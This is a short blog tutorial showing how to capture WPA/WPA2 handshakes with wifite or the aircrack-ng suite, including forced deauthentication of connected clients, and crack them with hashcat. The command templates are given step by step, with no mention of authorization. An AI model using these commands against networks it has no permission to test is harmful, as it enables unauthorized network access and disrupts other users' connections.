Cracking Wifi Passwords (WPA/WPA2)

Submitted by jabrown on Mon, 12/18/2017 - 04:34

The process for cracking WPA/2 passwords is simple.

First, capture the handshake between the access point and clients from the target network.

Second, crack the password with a password cracker like John the Ripper, Hashcat, or aircrack.

 

There are several ways to capture the WPA handshake. We'll be going over two, wifite and airodump. We will also be using Hashcat to crack the WPA password.

Wifite:

To start wifite we just use this command wifite -i {wireless interface}<

wifite1

It should then provide a list of wireless access point and information about each. Such as the if it uses WPA or if it has WPS enabled.

wifite_list

We stop wifite's monitoring and pass a list of access point we want to target.

wifite sel

Wifite will try to capture a WPA handshake. If it doesn't see one, it will then try sending deauthenication packets. This should cause clients connected to the access point to reconnect and generate the four-way WPA handshake.

wifite cap2

Once we have a captured handshake, we will need to convert it to a Hashcat compatible format. We can use a tool in the Hashcat-utils git repository to convert the pcap to a hccapx. We will use cap2hccapx.bin {wpa pcap file} {wpa hccapx file} to convert the pcap file.

cap2

We can now use Hashcat to crack the WPA password with this command hashcat -a 0 -m 2500 {hccapx file} {wordlist}

hashcat cmd

Hashcat cracked the password. Cracking WPA passwords with Hashcat does take a while and depends a lot on the size of the wordlist. The larger the wordlist the longer it will take. It would be beneficial to have a wordlist custom designed for cracking WPA passwords. 

hashcat crack

 

Airodump:

When capturing the WPA handshake with Airodump-ng, we will need to use additional tools. We will be using Airmon-ng to put the interface into monitor mode, Airodump-ng to find access points and to capture the WPA handshake, and we will use Aireplay to send deauthencation packets to force devices to reconnect to the target access point.

To put the wireless interface into monitor mode, we will use this command airmon-ng start {interface}. This will create a new interface name. it will look similar to "wlan1mon".

airmon

We will use the monitor interface with Airodump to find our target access point with this command airodump-ng {monitor interface}.

airodump list

We will start the packet capture after identifying the BSSID and the channel of the target access point. If a connected client has been identified make sure to take note of its MAC address. With the necessary access point information gathered we can add it to this command airodump-ng --bssid {bssid} -c {channel} -w {pcap file} {interface}.

airodump cap

It may be necessary to cause connected devices to reconnect to the access point. We will use Aireplay to do this by sending deauthencation packets to the client device. The command will be something like this aireplay-ng -0 {packet count} -a {bssid} -c {client MAC} {interface}.

aireplay

Once we have captured the WPA handshake. We will use cap2hccapx to convert it to the Hashcat format.

cap2h

We then use Hashcat to crack the password.

hashcat cmd

 

Visit the store or contact us if you need to recover some passwords.

Store

 


https://github.com/derv82/wifite

https://aircrack-ng.org/

https://hashcat.net/hashcat/

https://github.com/hashcat/hashcat-utils